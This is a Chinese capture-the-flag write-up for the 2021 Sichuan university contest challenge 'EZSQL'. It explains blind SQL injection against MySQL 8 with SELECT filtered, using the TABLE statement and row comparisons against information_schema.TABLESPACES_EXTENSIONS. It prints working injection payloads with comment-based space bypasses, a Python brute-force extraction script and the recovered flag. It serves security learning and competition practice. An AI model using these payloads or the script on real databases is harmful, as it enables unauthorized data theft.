2021年四川省大学生网络安全技能大赛EZSQL

操作内容:

考点:MYSQL8新特性

fuzz之后发现,只能盲注,过滤了select,使用1' and (ascii(substr(database(),1,1)))>num --+ 可以盲注出数据库,但是后面就搞不动了

无select注入,使用的是table语句。

TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]

这个作用是列出表的全部内容,于是就可以利用这个语句来进行注入。

首先需要知道表名使用MySQL一些自带的特殊表来盲注表

information_schema.TABLESPACES_EXTENSIONS

2021年四川省大学生网络安全技能大赛EZSQL

使用这个语句来一个一个字段的注入出表名,使用这个语句进行注入只能单列查询不能如同联合查询一般使用group_concat来连接要查询的字段。所以只能用limit来限制输出的内容。

2021年四川省大学生网络安全技能大赛EZSQL

使用盲注将所需的表名注入出来
2021年四川省大学生网络安全技能大赛EZSQL

这里两个空位代表着表的两个字段,一张表中有多少个字段就要有多少个空位。

在注入时还有几个规律要注意:

首先需要从第一个字段开始猜解数据,如果不按顺序来得到的数据永真。
2021年四川省大学生网络安全技能大赛EZSQL

2021年四川省大学生网络安全技能大赛EZSQL

其实第二个字段应该为空,所以需要从第一个字段开始猜解。这是坑点之一,也算是一个难点。

第二个难点是猜解字符串时truefalse的出现时机,在最后一位字符之前都是相同的。

在前面的字符猜解时,直到正确的字符出现时,ascii码小于或等于这个字符的查询结果永真。

2021年四川省大学生网络安全技能大赛EZSQL

2021年四川省大学生网络安全技能大赛EZSQL

这个字段的值为mysql因此到m之前的所有字符都为真。
2021年四川省大学生网络安全技能大赛EZSQL

直到n这个字符,也就是大于m的才会为假。

只能使用字符串拼接的方式逐字查询也就是m my mys这样的方式逐步拼接字符串
2021年四川省大学生网络安全技能大赛EZSQL

在最后一个字符时规则又跟之前的字符不同,当查询的字符串到达最后一个字符时,ascii码小于这个字符的永真,大于或等于这个字符的才为假。
2021年四川省大学生网络安全技能大赛EZSQL

2021年四川省大学生网络安全技能大赛EZSQL

最后一个要点,当第一个字符是正确时后面拼接的字符才能正确判断

mysql<=mysql aasda<=mysql gasdassd <=mysql

这三种情况都是真,第一个字符不正确且结果为真的情况下无论怎么拼接字符串,输出的结果都为真。

先爆破表数量再注入猜解表名

1'and('{}','')<=(TABLE/**/information_schema.TABLESPACES_EXTENSIONS/**/LIMIT 0,1)--+
                                                                                     ![图片](https://woshilnp.github.io/wzimg/197.png)

2021年四川省大学生网络安全技能大赛EZSQL

2021年四川省大学生网络安全技能大赛EZSQL

得到表名后再猜字段数 ,一个个加空格直到结果为真

payload="1'and("","","")<=(TABLE/*\**\*/fakeflag/\*\*/limit/**/0,1)--+"

2021年四川省大学生网络安全技能大赛EZSQL

2021年四川省大学生网络安全技能大赛EZSQL

最后就是从第一个字段开始注数据慢慢找flag了。

payload="1'and(4,"fl4gg","{}")<=(TABLE/**/fakeflag/**/limit/**/3,1)--+"

脚本如下:

import requests
from urllib import parse
ascii="/0123456789:;ABCDEFGHIJKLMNOPQRSTUYWXYZ_.abcdefghijklmnopqrstuvwxyz{|}~"
def exp(url):
    result=""
    tablename=""
    j=0
    while j<=100:
        j+=1
        tablename=result
        for i in ascii:

            payload="1'and(4,\"fl4gg\",\"{}\")<=(TABLE/**/fakeflag/**/limit/**/3,1)--+".format(tablename+i)
            #payload="1'and('{}','')<=(TABLE/**/information_schema.TABLESPACES_EXTENSIONS/**/LIMIT 7,1)--+".format(tablename+i)
            re=requests.get(url+payload)
            #print(url+payload)
            if "Enjoy This Game" not in re.text:
                result+=chr(ord(i)-1)
                print(result)
                break
    result=result[:-1]+chr(ord(result[-1])+1)
    print(result)

url="http://127.0.0.1/?id="
exp(url)

flag值

flag{31df1d6dca4683ad8c27acf8c7c04326}
上一篇:ASCII码表


下一篇:2021年5月21日之机器智能实验二代码跑不通之“认真debug“